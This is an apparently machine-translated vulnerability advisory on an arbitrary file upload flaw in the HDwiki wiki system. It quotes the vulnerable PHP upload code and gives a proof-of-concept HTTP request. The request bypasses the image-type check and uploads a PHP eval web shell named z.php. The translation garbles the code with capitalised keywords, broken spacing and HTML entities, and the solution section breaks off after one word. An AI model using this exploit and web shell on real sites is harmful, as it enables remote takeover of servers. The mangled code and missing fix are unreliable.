Remote code execution vulnerability caused by HDwiki file upload and repair

As the first Chinese Wiki system with independent intellectual property rights in China, HDwiki was officially launched by interactive online (Beijing) Technology Co., Ltd. on September 10, November 28, 2006, we strive to provide a free, easy-to-use, and powerful Wiki site building system for many Wikipedia fans at home and abroad. The launch of HDwiki fills the gaps in the Chinese Wiki website construction system

However, some upload functions in HDwiki have security vulnerabilities. You can use some data to bypass the upload restriction and ultimately control the remote site.
Detailed description:
Lib/file. class. php
Function uploadfile ($ attachment, $ target, $ maxsize = 1024, $ is_image = 1 ){

$ Result = array ('result' => false, 'msg '=> 'upload mistake ');

If ($ is_image ){

$ Attach = $ attachment;

$ Filesize = $ attach ['SIZE']/1024;

If (0 = $ filesize ){

$ Result ['msg '] =' & #19978; & #20256; & #38169; & #35823 ;';

Return $ result;

}

If (substr ($ attach ['type'], 0, 6 )! = 'Image /'){

$ Result ['msg '] =' & #26684; & #24335; & #38169; & #35823 ;';

Return $ result;

}

If ($ filesize> $ maxsize ){

$ Result ['msg '] =' & #25991; & #20214; & #36807; & #22823 ;';

Return $ result;

}

} Else {

$ Attach ['tmp _ name'] = $ attachment;

}

$ Filedir = dirname ($ target );

File: forcemkdir ($ filedir );

If (@ copy ($ attach ['tmp _ name'], $ target) | @ move_uploaded_file ($ attach ['tmp _ name'], $ target )){

No check

Triggered in attachment. php
Function douploadimg (){

$ Imgname = $ _ FILES ['photofile'] ['name'];

$ Extname = file: extname ($ imgname );

$ Destfile = $ _ ENV ['attachment']-> makepath ($ extname );

$ Arrupload = file: uploadfile ($ _ FILES ['photofile'], $ destfile );
Proof of vulnerability:
POST/hdwiki/index. php? Attachment-uploadimg HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword ,*/*

Referer: http://www.bkjia.com/

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary = --------------------------- 7db261e100f2e

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;. net clr 2.0.50727; InfoPath.2)

Host: www.2cto.com

Content-Length: 370

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: Keys = 1298002704449; hd_sid = raG13H; hd_auth = 4113YBBXXB13XtdR6EXTA1Cb9BuhZMK % keys % 2F5gc6pLm9fZ % 2Bdgv68MT; hd_searchtime = 1300983373

 

----------------------------- 7db261e100f2e

Content-Disposition: form-data; name = "MAX_FILE_SIZE"

 

30000

----------------------------- 7db261e100f2e

Content-Disposition: form-data; name = "photofile"; filename = "C: \ fucker \ z. php"

Content-Type: image/image

 

Zzz <? Eval ($ _ REQUEST [z])?>

----------------------------- 7db261e100f2e --
Solution:
Amount